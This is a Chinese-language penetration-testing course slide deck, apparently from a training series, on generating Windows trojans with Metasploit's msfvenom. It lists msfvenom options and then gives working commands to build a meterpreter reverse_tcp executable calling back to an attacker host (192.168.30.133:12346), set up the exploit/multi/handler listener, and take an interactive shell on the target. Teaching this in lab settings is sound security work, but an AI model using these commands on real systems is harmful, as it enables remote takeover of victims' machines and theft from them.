6.利用msf模块中的msfvenom模块生成木马陆小马功钟浩.pptxVIP

Web安全漏洞与渗透测试 @讲师：陈殷 My introduction 山丘安全攻防实验室创始人. Founder of the Hill Security lab Team. DEF CON GROUP 860931演讲者. DEF CON GROUP 860931 speaker. 北京三思网安科技有限公司广东分公司安全员. Beijing sansi security technology co., LTD. Guangdong branch security officer. 擅长 渗透测试、PHP开发、社会工程学. Penetration testing , PHP, Social engineering. 陈殷 Metaspliot木马生成原理方法 muma MSF 生成方式：利用msf模块中的msfvenom模块 原理：msfvenom是msfpayload、msfencode的结合体，利用msfvenom生成木马程序，并在目标机上执行，在本地监听上线 云主机 Ubuntu windows 使用说明： -p, --payload 使用指定的payload -l, --list [module_type] 列出指定模块可用的payloads，包括payloads、encoders、nops、all -n, --nopsled 为payload指定一个 nopsled 长度 -f, --format 指定输出格式，如exe等 -e, --encoder 使用编码器 -a, --arch 指定payload构架（x86、x64） --platform 指定payload平台 -s, --space 指定payload攻击荷载的最大长度 -b, --bad-chars 指定规避字符集，如: \x00\xff‘ 使用说明： -i, --iterations 指定编码次数 -c, --add-code 指定一个附加的win32 shellcode 文件 -x, --template 指定一个可执行文件作为模板 -k, --keep payload自动分离并注入到新的进程 -o, --out 保存生成的payload -v, --var-name 指定自定义变量 -h, --help 显示帮助文件 msfvenom --list platforms 显示支持的平台 msfvenom --list formats 显示支持的格式 msfvenom编码器 msfvenom --list encoders metasploit生成windows木马并尝试提权 攻击机ip：192.168.30.133 靶机ip：192.168.30.130 攻击端口：12346 生成一个木马 msfvenom -p windows/meterpreter/reverse_tcp LHOST=Your IP Address LPORT=Your Port to Connect On -f exe shell.exe msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp lhost=192.168.30.133 lport=12346 -f exe -o wind.exe lhost为攻击机ip lport为攻击机端口 接着我们要使用到一个后门模块，配置一个反弹会话处理程序，叫做‍‍‍‍exploit/multi/handler‍‍ use exploit/multi/handler‍‍ msf远控 set lhost 192.168.30.133 set lport 12346 在靶场运行chenx.exe 成功建立连接 比如：sysinfo 输入shell进入交互式cmd chcp 65001修正 FOCUS US 加入星球，解锁全部课程 THANK YOU